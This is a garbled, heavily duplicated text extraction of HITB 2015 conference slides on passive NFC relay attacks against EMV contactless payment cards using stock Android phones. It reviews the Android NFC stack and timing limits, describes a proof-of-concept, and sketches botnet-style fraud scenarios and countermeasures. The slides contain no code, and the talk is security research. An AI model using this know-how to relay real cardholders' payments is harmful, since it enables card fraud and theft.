Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (II)
Wow NFC sounds pretty hipsterTwo main elements
Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)
Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36
Introduction to NFC (III)
ISOIEC 14443 standardFour-part international standard forcontactless smartcards
1 Size physical characteristics etc2 RF power and signalling schemes
(Type A amp B)Half-duplex 106 kbps rate
3 Initialization + anticollision protocol4 Data transmission protocol
IsoDep cards compliant with the fourparts
Example contactless payment cards
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (II)
Wow NFC sounds pretty hipsterTwo main elements
Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)
Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36
Introduction to NFC (III)
ISOIEC 14443 standardFour-part international standard forcontactless smartcards
1 Size physical characteristics etc2 RF power and signalling schemes
(Type A amp B)Half-duplex 106 kbps rate
3 Initialization + anticollision protocol4 Data transmission protocol
IsoDep cards compliant with the fourparts
Example contactless payment cards
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
